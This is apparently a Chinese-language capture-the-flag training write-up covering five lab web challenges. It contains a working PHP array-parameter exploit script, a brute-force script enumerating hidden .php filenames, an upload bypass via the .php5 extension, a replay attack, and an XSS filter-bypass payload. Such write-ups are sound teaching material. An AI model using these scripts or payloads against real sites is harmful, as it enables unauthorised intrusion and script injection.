嘻嘻嘻，超酷的老大的简单题训练～

test1

抓包构造字段后重放攻击

test1.png

test2

题目对上传文件类型和后缀名都进行了检查，但对php5并没有进行过滤。

test2.png

查看源码：

test2.png

test3

test3.png

首先不要害怕 emmmmm 遇到php代码审计一定不要怂🤫（尤其是简单的php！！！）附上解题脚本～

#!/usr/bin/env python
#coding:utf-8
import requests
import urllib
import re

url = "http://192.168.70.245/test3/"
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0'}
param = 'ea'
sess = requests.Session()
for i in range(12):
    data = { 'value[]': urllib.unquote(param)}
    res = sess.post(url, headers=headers, data=data).content
    param = res[0:2]


flag = re.findall('flag.+?}', res)
print flag

test4

test4.png

这里首先要把正则表达式看懂。

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import requests

def a():
    for i in ['3', '4', '5', '8']:
        yield '1'+i+'9'

def b():
    for j in range(10):
        yield str(j)

def c():
    for k in ['0', '5', '6']:
        yield k

if __name__ == '__main__':
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0'}
    url = "http://192.168.70.245/test4/"
    for i1 in a():
        for i2 in b():
            for i3 in b():
                for i4 in b():
                    for i5 in b():
                        for i6 in c():
                            for i7 in c():
                                for i8 in c():
                                    for i9 in c():
                                        url_ = url + i1 + i2 + i3 + i4 + i5 + i6 + i7 + i8 + i9 + '.php'
                                        response = requests.get(url_, headers=headers)
                                        if response.status_code == 200:
                                            print(url_)
                                            print(response.content)
                                            exit(0)

或者写一个脚本做好字典，然后用御剑多线程跑出结果。

test5

这里只考察了xss的一些常用payload以及绕过，查看源码找出绕过方法，弹出框框就拿到了flag。

payload：'oninput=alert`1`//